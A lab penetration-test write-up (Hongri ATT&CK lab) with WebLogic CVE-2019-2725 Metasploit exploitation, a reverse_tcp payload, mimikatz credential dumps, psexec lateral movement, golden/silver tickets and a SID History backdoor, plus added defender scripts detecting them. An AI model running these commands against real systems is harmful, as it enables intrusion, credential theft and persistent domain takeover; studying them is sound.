Environment setup

First, switch our NAT network to the lab's subnet

Then configure it


WEB target: this one must first be restored to the V1.3 snapshot before the default password works for login


Then go to C:\Oracle\Middleware\user_projects\domains\base_domain\bin

Administrator account: Administrator/1qaz@WSX

Start the WebLogic service as administrator


```
netstat -ano | findstr 7001
```

Boot the PC host and log in with the username and password so that 360 (the antivirus) starts automatically

External foothold

Gathering IP information

```
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:a8:7e, IPv4: 192.168.111.145
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.111.1 00:50:56:c0:00:08 VMware, Inc.
192.168.111.2 00:50:56:fc:4b:0c VMware, Inc.
192.168.111.80 00:0c:29:a3:4d:99 VMware, Inc.
192.168.111.143 00:0c:29:47:7d:be VMware, Inc.
192.168.111.201 00:0c:29:70:b8:b3 VMware, Inc.
192.168.111.254 00:50:56:fe:0b:2d VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.906 seconds (134.31 hosts/sec). 6 responded
```

Gathering target information

```
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -sV -Pn -T4 -A 192.168.111.80
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-20 03:48 EDT
Nmap scan report for 192.168.111.80
Host is up (0.00055s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
|_ssl-date: 2023-04-20T07:50:43+00:00; +2s from scanner time.
| ms-sql-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-04-20T07:08:57
|_Not valid after: 2053-04-20T07:08:57
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2023-04-19T06:59:42
|_Not valid after: 2023-10-19T06:59:42
|_ssl-date: 2023-04-20T07:50:43+00:00; +2s from scanner time.
7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:A3:4D:99 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7
OS details: Microsoft Windows 7
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: WEB
| NetBIOS computer name: WEB\x00
| Domain name: de1ay.com
| Forest name: de1ay.com
| FQDN: WEB.de1ay.com
|_ System time: 2023-04-20T15:50:02+08:00
| ms-sql-info:
| 192.168.111.80:1433:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 1433
|_clock-skew: mean: -1h19m58s, deviation: 3h15m57s, median: 0s
|_nbstat: NetBIOS name: WEB, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:a3:4d:99 (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-20T07:50:02
|_ start_date: 2023-04-20T07:09:24

TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.111.80

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.90 seconds
```
```
80     IIS 7.5
139    Samba/NetBIOS service present, possibly remote command execution; the MS17-010 (EternalBlue) vulnerability is attacked precisely through ports 139/445
445    SMB: pass-the-hash attacks, weak passwords, MS08-067 overflow
1433   MSSQL: weak passwords
3389   Windows Remote Desktop: pass-the-hash attacks, weak passwords
7001   Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
```

Tried EternalBlue, but it was blocked by 360

Starting from WebLogic instead: scan and probe it with a tool


Check for antivirus software with tasklist


Behinder (冰蝎) webshell

Get the path and write the shell


```
\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\aaanz.jsp
```


Write the Behinder shell


Getting a shell with msf

Exploit module

```
search CVE-2019-2725
use exploit/multi/misc/weblogic_deserialize_asyncresponseservice   # enter the CVE-2019-2725 exploit module
set target Windows            # this module defaults to unix, so change it to Windows
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.111.145
set rhosts 192.168.111.80     # the target to attack
exploit
```


It succeeded after one more try
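The exploit above posts to the WebLogic async web-service endpoint, and the webshell is dropped under the admin console's image directory; both leave traces in the HTTP access log. The script below is an added, defender-side example (not part of the original post and not from any project the post uses): it parses constructed Common Log Format lines, flags POSTs to the known deserialization endpoints and any .jsp served from a console skin directory, then correlates sources that show both. The sample lines, the /console/ URL mapping of the consoleapp skins directory and the CLF layout are assumptions.

```python
import re

# Constructed sample access-log lines in Common Log Format; these are NOT real traffic from the lab.
# Line 2 models the CVE-2019-2725 request, lines 3-4 model the webshell being fetched and used,
# line 6 models a CVE-2017-10271-style request from another source with no follow-up.
SAMPLE_LOG = """\
192.168.111.145 - - [20/Apr/2023:18:33:10 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4721
192.168.111.145 - - [20/Apr/2023:18:34:02 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 202 0
192.168.111.145 - - [20/Apr/2023:18:34:05 +0800] "GET /console/framework/skins/wlsconsole/images/aaanz.jsp HTTP/1.1" 200 12
192.168.111.145 - - [20/Apr/2023:18:35:41 +0800] "POST /console/framework/skins/wlsconsole/images/aaanz.jsp HTTP/1.1" 200 88
10.10.10.201 - - [20/Apr/2023:18:36:00 +0800] "GET /console/framework/skins/wlsconsole/images/logo.png HTTP/1.1" 200 3012
10.10.10.201 - - [20/Apr/2023:18:36:07 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1203
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Web-service endpoints abused by the WebLogic XMLDecoder deserialization bugs
# (/_async/* for CVE-2019-2725, /wls-wsat/* for the older CVE-2017-10271).
DESER_ENDPOINTS = ("/_async/", "/wls-wsat/")
# Static-content directories of the admin console; a .jsp served from here is not legitimate
# (the lab webshell sits under .../skins/wlsconsole/images/). The /console/ URL mapping is an assumption.
STATIC_DIRS = ("/console/framework/skins/",)


def parse_log(text):
    """Parse CLF lines into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def classify(entry):
    """Return a finding tag for one request, or None if it looks benign."""
    path = entry["path"].lower()
    if entry["method"] == "POST" and path.startswith(DESER_ENDPOINTS):
        return "deserialization-endpoint-post"
    if path.endswith(".jsp") and path.startswith(STATIC_DIRS):
        return "jsp-in-static-dir"
    return None


def find_suspicious_requests(text):
    """Every request that hits a known deserialization endpoint or a JSP in a static directory."""
    findings = []
    for e in parse_log(text):
        tag = classify(e)
        if tag:
            findings.append((e["src"], e["ts"], tag, e["method"], e["path"], int(e["status"])))
    return findings


def correlate_sources(text):
    """Sources that both POSTed to a deserialization endpoint and touched a JSP in a static
    directory: the exploit-then-webshell sequence shown in the write-up."""
    seen = {}
    for src, _ts, tag, _method, _path, _status in find_suspicious_requests(text):
        seen.setdefault(src, set()).add(tag)
    return sorted(src for src, tags in seen.items()
                  if {"deserialization-endpoint-post", "jsp-in-static-dir"} <= tags)


if __name__ == "__main__":
    for finding in find_suspicious_requests(SAMPLE_LOG):
        print(finding)
    print("exploit-then-webshell sources:", correlate_sources(SAMPLE_LOG))
```

Run against the constructed log, the single-request rules flag four lines, and the correlation narrows to the one source that exhibits the full sequence; a source that only probes the endpoint without a follow-up stays at the lower-confidence tier.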

Internal network penetration

Continuing with approach two

Disable the antivirus and the firewall

```
run killav                                   # try to kill the AV, but the Java meterpreter does not support it
shell
chcp 65001
netsh advfirewall show allprofiles state     # disabling the firewall does work
netsh advfirewall set allprofiles state off
```


Direct privilege escalation attempt fails

```
meterpreter > getsystem
[-] Error running command getsystem: Rex::TimeoutError Send timed out
```

Privilege escalation via process migration

Then list the processes to get a PID and use migrate to move into a high-privilege process

SYSTEM privileges obtained


Privilege escalation via token stealing

```
load incognito                             # load incognito (impersonation)
getuid                                     # view the current token
list_tokens -u                             # list the available tokens
impersonate_token "NT AUTHORITY\\SYSTEM"   # steal the token; the format is impersonate_token "hostname\\username"
rev2self                                   # return to the previous token
```


Success

Obtaining account passwords with kiwi

```
meterpreter > load kiwi
meterpreter > creds_all
```

A domain administrator has logged on to this host, so we get the plaintext password directly; we can therefore enable port 3389, log in over remote desktop and disable the antivirus directly

```
query user     # check first so that our remote desktop session does not get bumped off
```

Passing the session to CS for privilege escalation

Passing the session from msf to CS

You can either upload an AV-evading payload through the webshell and execute it, or have msf pass the session directly, but the firewall must be disabled first; try a ping first to check connectivity

Here we continue with approach two: after connecting with the msf module, background the session

```
sessions -i id     # enter the interactive session
```
```
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_tcp
set DisablePayloadHandler true
# By default payload_inject starts a new handler locally after it runs; since we already have one,
# there is no need to start another, so we set this to true
set lhost 192.168.111.143     # the IP CS is listening on
set lport 6666                # the port CS is listening on
set session 2                 # the session to spawn from
exploit
```


That is all it takes; no proxy is needed


```
beacon> sleep 1
[*] Tasked beacon to sleep for 1s
[+] host called home, sent: 16 bytes
beacon> shell ipconfig /all

beacon> shell ping de1ay.com     # get the domain controller's internal IP

beacon> net view

Server Name IP Address Platform Version Type Comment
----------- ---------- -------- ------- ---- -------
DC 10.10.10.10 500 6.3 PDC
PC 192.168.111.201 500 6.1
WEB 192.168.111.80 500 6.1

beacon> shell net group "domain controllers" /domain

beacon> shell net group "domain computers" /domain

[*] Ladon 10.10.10.0/24 OnlinePC
load OnlinePC
10.10.10.0/24 is Valid CIDR
IPCound: 256
Scan Start: 2023-04-21 18:16:40
ICMP: 10.10.10.10 00-0C-29-38-C5-2F DC VMware
ICMP: 10.10.10.80 00-0C-29-A3-4D-A3 WEB VMware
DNS: 10.10.10.201 00-0C-29-70-B8-BD PC.de1ay.com VMware
=============================================
OnlinePC:3
Cidr Scan Finished!
```

Lateral movement

The DC has no outbound internet access, so pass-the-hash has to go over SMB

Lateral movement with psexec (msf)

Port 445 is open, so after adding a route we can simply use exploit/windows/smb/psexec

```
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 1qaz@WSX
```

Lateral movement with psexec (CS)


```
beacon> rev2self
[*] Tasked beacon to revert token
beacon> make_token DE1AY\Administrator 1qaz@WSX
[*] Tasked beacon to create a token for DE1AY\Administrator
beacon> jump psexec DC SMB
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_a9) on DC via Service Control Manager (\\DC\ADMIN$\9ca293a.exe)
[+] host called home, sent: 287632 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
Started service 9ca293a on DC
[+] established link to child beacon: 10.10.10.10
```

The beacon checked in successfully


Post-exploitation persistence

Golden ticket

Requirements:

1. The domain name

2. The domain SID (a user's SID with the last dash-separated number removed is the domain SID)

3. The NTLM hash of the domain's KRBTGT account

4. An arbitrary forged username

(Obtaining the domain SID and the KRBTGT account's NTLM hash presupposes that domain privileges have already been obtained)

A golden ticket is encrypted as a TGT; its validity period is usually 10 hours

Obtaining the NTLM password hash of the domain KRBTGT account

```
hashdump

//82dfc71b72a11ef37d663047bc2088fb
```


The domain SID

```
logonpasswords

//S-1-5-21-2756371121-2868759905-3853650604-1001
```


Or

```
wmic useraccount get name,sid
```


```
mimikatz kerberos::golden /user:de1ay /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /endin:480 /renewmax:10080 /ptt
```

Success


Creating the ticket

```
mimikatz kerberos::golden /user:de1ay /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /ticket:ticket.kirbi
```

```
mimikatz kerberos::ptt ticket.kirbi
```
```
beacon> mimikatz kerberos::golden /user:de1ay /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /ticket:ticket.kirbi
[*] Tasked beacon to run mimikatz's kerberos::golden /user:de1ay /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /ticket:ticket.kirbi command
[+] host called home, sent: 787058 bytes
[+] received output:
User : de1ay
Domain : de1ay.com (DE1AY)
SID : S-1-5-21-2756371121-2868759905-3853650604
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 82dfc71b72a11ef37d663047bc2088fb - rc4_hmac_nt
Lifetime : 2023/4/21 21:54:38 ; 2033/4/18 21:54:38 ; 2033/4/18 21:54:38
-> Ticket : ticket.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

beacon> mimikatz kerberos::ptt ticket.kirbi
[*] Tasked beacon to run mimikatz's kerberos::ptt ticket.kirbi command
[+] host called home, sent: 787055 bytes
[+] received output:

* File: 'ticket.kirbi': OK
```
```
mimikatz kerberos::purge                  // clear all credentials on the current machine; cached domain-member credentials would interfere with the forged ticket
mimikatz kerberos::list                   // list the credentials on the current machine
mimikatz kerberos::ptt <ticket file>      // inject the ticket into memory
```

Simulating the DC session being cleared: the golden ticket can still be used to escalate privileges


The DC's C: drive is accessible as normal

```
shell dir \\10.10.10.10\c$
```

SID History domain backdoor

SID History exists so that a user's permissions do not change after being migrated into a different domain. The principle: if the user's SID changes after migration, the system adds the original SID to the migrated user's SID History attribute, so the user can still access the original resources. With mimikatz a SID can be added to any user's SID History attribute, which gives persistence once domain administrator privileges have been obtained.

Create a malicious user named whoami on the domain controller

```
net user whoami Liu78963 /add
```

Launch mimikatz via shellcode_inject and add the domain administrator Administrator's SID to the SID History attribute of the malicious domain user whoami

```
privilege::debug
sid::patch                                 # patch the NTDS service so that a high-privilege SID can be injected into a low-privilege user's SID History attribute
sid::add /sam:whoami /new:Administrator    # add Administrator's SID to whoami's SID History attribute
```


Then verify whoami's SID History with PowerShell

```
load powershell
powershell_shell
Import-Module activedirectory
Get-ADUser whoami -Properties sidhistory
Get-ADUser administrator -Properties sidhistory
```


Now whoami has the administrator's domain admin privileges, and this user can be used to log on to the domain controller
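An added audit check, not from the original post, for the SID History backdoor just described. It applies the rule from the golden-ticket section (the domain SID is the account SID minus its last number) and flags any sIDHistory entry that either belongs to the user's own domain, which a genuine migration never produces, or carries a privileged RID. The user records are constructed to look like Get-ADUser -Properties sidhistory output; the RIDs 1110/1111 and the second domain SID are made up for the example.

```python
import re

# Domain-account SID: S-1-5-21-<three sub-authorities>-<RID>
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")

# Well-known RIDs whose presence in sIDHistory grants built-in privileges
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins",
                   518: "Schema Admins", 519: "Enterprise Admins"}


def split_sid(sid):
    """Split a domain-account SID into (domain SID, RID).
    The domain SID is everything before the last dash and the RID is the last number,
    which is the rule the golden-ticket section uses to derive the domain SID."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain account SID: {sid}")
    rid_text = m.group(1)
    return sid[: -(len(rid_text) + 1)], int(rid_text)


# Constructed directory records shaped like Get-ADUser <name> -Properties sidhistory output;
# they are NOT dumps from the lab. RIDs 1110/1111 and the 1111111111-... domain SID are invented.
USERS = [
    {"sam": "administrator",
     "sid": "S-1-5-21-2756371121-2868759905-3853650604-500", "sidhistory": []},
    {"sam": "whoami",
     "sid": "S-1-5-21-2756371121-2868759905-3853650604-1110",
     "sidhistory": ["S-1-5-21-2756371121-2868759905-3853650604-500"]},
    {"sam": "migrated.user",
     "sid": "S-1-5-21-2756371121-2868759905-3853650604-1111",
     "sidhistory": ["S-1-5-21-1111111111-2222222222-3333333333-1105"]},
]


def audit_sid_history(users):
    """Return (account, historical SID, reasons) for every sIDHistory entry that should not exist."""
    findings = []
    for u in users:
        own_domain, _ = split_sid(u["sid"])
        for hist in u["sidhistory"]:
            hist_domain, rid = split_sid(hist)
            reasons = []
            # A real migration copies SIDs from a *different* source domain; a history entry from the
            # user's own domain can only have been written directly (sid::add does exactly that).
            if hist_domain == own_domain:
                reasons.append("history SID belongs to the user's own domain")
            if rid in PRIVILEGED_RIDS:
                reasons.append(f"privileged RID {rid} ({PRIVILEGED_RIDS[rid]})")
            if reasons:
                findings.append((u["sam"], hist, reasons))
    return findings


if __name__ == "__main__":
    for sam, hist, reasons in audit_sid_history(USERS):
        print(f"{sam}: {hist} -> {'; '.join(reasons)}")
```

On the constructed data only whoami is reported, on both counts; the migrated user's entry comes from another domain SID with an ordinary RID and passes. Feeding real records in only requires mapping the ObjectSID and SIDHistory values of each user into the same dict shape.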

PC

Create a drive mapping from WEB to PC

```
shell net use X: \\pc\c$
```


Interactive command execution over remote desktop from Kali

```
Load Open3389
Default Port is 3389 (0xd3d)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
PortNumber REG_DWORD 0xd3d
操作成功完成
```

```
rdesktop 192.168.111.80:3389
```


Then upload the payload

```
copy C:\Users\mssql\big.exe \\pc\c$
```

Create a scheduled task

```
at \\pc 10:39:00 cmd.exe /c "start C:\\big.exe"
```
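Both the psexec move to DC earlier (a randomly named service binary started from ADMIN$) and the at.exe task on PC just above generate Windows events that a defender can triage: System event 7045 for the service install and Security event 4698 for the task creation. The script below is an added example, not part of the original post, that applies simple heuristics to constructed records shaped like the fields a SIEM extracts from those two events; the records, field names and the heuristics' thresholds are assumptions, not lab telemetry.

```python
import re

# Constructed event records, shaped like the fields a SIEM extracts from System/7045
# (service installed) and Security/4698 (scheduled task created). They are NOT real lab telemetry;
# the first and third model the psexec service and the at.exe task from the write-up.
EVENTS = [
    {"id": 7045, "host": "DC", "ServiceName": "9ca293a",
     "ImagePath": r"\\127.0.0.1\ADMIN$\9ca293a.exe", "AccountName": "LocalSystem"},
    {"id": 7045, "host": "WEB", "ServiceName": "WinDefend",
     "ImagePath": r"C:\Program Files\Windows Defender\MsMpEng.exe", "AccountName": "LocalSystem"},
    {"id": 4698, "host": "PC", "SubjectUserName": "Administrator", "TaskName": r"\At1",
     "Command": "cmd.exe", "Arguments": r'/c "start C:\big.exe"'},
    {"id": 4698, "host": "PC", "SubjectUserName": "SYSTEM",
     "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "Command": r"%windir%\system32\defrag.exe", "Arguments": "-c -h -o -$"},
]

RANDOM_NAME = re.compile(r"^[0-9a-f]{7,8}$", re.I)            # e.g. 9ca293a
ADMIN_SHARE = re.compile(r"\\\\[^\\]+\\(ADMIN|C)\$\\", re.I)    # \\host\ADMIN$\... or \\host\C$\...
AT_TASK = re.compile(r"^\\At\d+$")                             # at.exe names its jobs At1, At2, ...
ROOT_EXE = re.compile(r"[A-Z]:\\[^\\\s\"]+\.exe", re.I)         # an .exe sitting directly in a drive root


def triage_service_install(ev):
    """Heuristics for a 7045 record."""
    reasons = []
    if RANDOM_NAME.match(ev["ServiceName"]):
        reasons.append("random-looking service name")
    if ADMIN_SHARE.search(ev["ImagePath"]):
        reasons.append("service binary served from an admin share (psexec-style lateral movement)")
    return reasons


def triage_task_create(ev):
    """Heuristics for a 4698 record."""
    reasons = []
    if AT_TASK.match(ev["TaskName"]):
        reasons.append("task created with at.exe")
    if ROOT_EXE.search(f'{ev["Command"]} {ev["Arguments"]}'):
        reasons.append("task launches an executable from a drive root")
    return reasons


def triage(events):
    """Return (event id, host, name, reasons) for each event that trips at least one heuristic."""
    findings = []
    for ev in events:
        if ev["id"] == 7045:
            reasons, name = triage_service_install(ev), ev["ServiceName"]
        elif ev["id"] == 4698:
            reasons, name = triage_task_create(ev), ev["TaskName"]
        else:
            continue
        if reasons:
            findings.append((ev["id"], ev["host"], name, reasons))
    return findings


if __name__ == "__main__":
    for event_id, host, name, reasons in triage(EVENTS):
        print(f"{host} {event_id} {name}: {'; '.join(reasons)}")
```

The Defender service and the built-in defrag task pass through untouched; the psexec service and the At1 job each trip two heuristics. In a real deployment the service-name rule would be the noisiest of the four and is best combined with the admin-share rule rather than used alone.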


The beacon checked in successfully


Silver ticket

Requirements:

1. The domain name

2. The domain SID (a user's SID with the last dash-separated number removed is the domain SID)

3. The NTLM hash of the service account

4. A forged username

5. An exploitable service

A silver ticket is encrypted as a TGS; it is usually valid for only a few minutes

Obtaining it

```
mimikatz sekurlsa::logonpasswords
```

Here we forge the cifs service; the hash to use should be DC$'s


```
kerberos::golden /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /target:DC.de1ay.com /service:cifs /rc4:9c9b02e33a331dce48e161488db8394c /user:test /ticket:silver.kirb
```

Log on as an ordinary domain user, clear the credentials first, then import the silver ticket into memory

```
kerberos::purge
kerberos::ptt <path of the generated ticket>
```
/domain: domain name

/sid: domain SID

/target: target server hostname

/service: service type

/rc4: NTLM hash of the target host

/user: an arbitrary forged name

/ticket: filename of the generated ticket


```
shell dir \\DC\c$
```


```
mimikatz kerberos::purge                  // clear all credentials on the current machine; cached domain-member credentials would interfere with the forged ticket
mimikatz kerberos::list                   // list the credentials on the current machine
mimikatz kerberos::ptt <ticket file>      // inject the ticket into memory
```
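The forged tickets from the golden-ticket section (the beacon output shows a Lifetime running from 2023 to 2033 under an rc4_hmac_nt key) and from this silver-ticket section (a cifs/DC.de1ay.com service ticket) both end up in a machine's ticket cache, where `klist` shows them. The script below is an added defender-side example, not part of the original post: it parses constructed klist output and flags tickets whose lifetime exceeds the domain policy, that use RC4, or that carry no KDC name (as an injected ticket does). The sample output, the locale-dependent time format and the default policy limits (10-hour TGT, 600-minute service ticket) are assumptions.

```python
import re
from datetime import datetime

# Constructed klist output (Windows "klist" ticket-cache listing), NOT captured from the lab.
# Ticket #0 models the golden TGT from the write-up (10-year lifetime, RC4 key, injected with ptt);
# ticket #1 models a normal service ticket for cifs/DC.de1ay.com, the service the silver ticket targets.
SAMPLE_KLIST = """\
Current LogonId is 0:0x3e7

Cached Tickets: (2)

#0>     Client: de1ay @ DE1AY.COM
        Server: krbtgt/DE1AY.COM @ DE1AY.COM
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 4/21/2023 21:54:38 (local)
        End Time:   4/18/2033 21:54:38 (local)
        Renew Time: 4/18/2033 21:54:38 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: mssql @ DE1AY.COM
        Server: cifs/DC.de1ay.com @ DE1AY.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 4/22/2023 11:02:10 (local)
        End Time:   4/22/2023 21:02:10 (local)
        Renew Time: 4/28/2023 11:02:10 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: DC.de1ay.com
"""

# Default domain Kerberos policy (assumed unchanged): TGT max 10 hours, service ticket max 600 minutes
MAX_TGT_HOURS = 10.0
MAX_SERVICE_HOURS = 10.0

FIELD_RE = re.compile(r"(Client|Server|KerbTicket Encryption Type|Start Time|End Time|Kdc Called):\s*(.*)$")
TIME_FMT = "%m/%d/%Y %H:%M:%S"   # klist's US-locale timestamp; adjust for other locales


def parse_klist(text):
    """Split klist output into one dict per cached ticket (each '#N>' block)."""
    tickets = []
    for line in text.splitlines():
        if re.match(r"^#\d+>", line):
            tickets.append({})
        m = FIELD_RE.search(line)
        if m and tickets:
            tickets[-1][m.group(1)] = m.group(2).strip()
    return tickets


def lifetime_hours(ticket):
    """Hours between Start Time and End Time of one parsed ticket."""
    start = datetime.strptime(ticket["Start Time"].replace(" (local)", ""), TIME_FMT)
    end = datetime.strptime(ticket["End Time"].replace(" (local)", ""), TIME_FMT)
    return (end - start).total_seconds() / 3600


def audit_tickets(text):
    """Return (server, reasons) for each cached ticket that looks forged or out of policy."""
    findings = []
    for t in parse_klist(text):
        is_tgt = t["Server"].startswith("krbtgt/")
        limit = MAX_TGT_HOURS if is_tgt else MAX_SERVICE_HOURS
        reasons = []
        hours = lifetime_hours(t)
        if hours > limit:
            reasons.append(f"lifetime {hours:.0f} h exceeds policy maximum {limit:.0f} h")
        if "RC4" in t["KerbTicket Encryption Type"]:
            reasons.append("ticket encrypted with RC4 (mimikatz default; AES expected in a modern domain)")
        if not t.get("Kdc Called"):
            reasons.append("no KDC recorded for this ticket (injected into the cache, not requested)")
        if reasons:
            findings.append((t["Server"], reasons))
    return findings


if __name__ == "__main__":
    for server, reasons in audit_tickets(SAMPLE_KLIST):
        print(server, "->", "; ".join(reasons))
```

The 10-year TGT trips all three checks, while the legitimately issued 10-hour AES service ticket passes. The lifetime check is the one that survives an attacker choosing AES keys, which is why the forged ticket's `/endin` and `/renewmax` values in the golden-ticket section matter to a defender: a ticket minted with the defaults is easy to spot, one minted within policy is not.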

The exe can also be used; when using CS directly, make sure to save the credentials

```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > hash.txt
```

Hongri (红日) ATT&CK Part 2 | 青 叶 (evalexp.top)